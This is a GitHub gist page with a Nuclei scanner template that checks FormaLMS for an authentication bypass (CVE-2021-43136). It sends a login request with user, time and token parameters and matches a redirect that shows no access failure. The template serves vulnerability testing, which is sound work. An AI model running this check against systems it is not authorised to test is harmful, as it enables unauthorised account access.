Skip to content

Instantly share code, notes, and snippets.

@hacktivesec
Last active December 18, 2023 06:50
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save hacktivesec/d2160025d24c5689d1bc60173914e004 to your computer and use it in GitHub Desktop.
Save hacktivesec/d2160025d24c5689d1bc60173914e004 to your computer and use it in GitHub Desktop.
FormaLMS Authentication Bypass - Nuclei Template
id: formalms-auth-bypass
info:
name: Formalms Auth Bypass
author: Cristian `void` Giustini
severity: high
reference: https://blog.hacktivesecurity.com/index.php/2021/10/05/the-evil-default-value-that-leads-to-authentication-bypass-on-formalms/
tags: formalms
cve: CVE-2021-43136
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?login_user={{login_user}}&time={{time}}&token={{token}}'
matchers-condition: and
matchers:
- type: word
words:
- 'access_failure'
part: header
negative: true
- type: status
status:
- 302
- type: word
words:
- "/index.php"
part: header
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment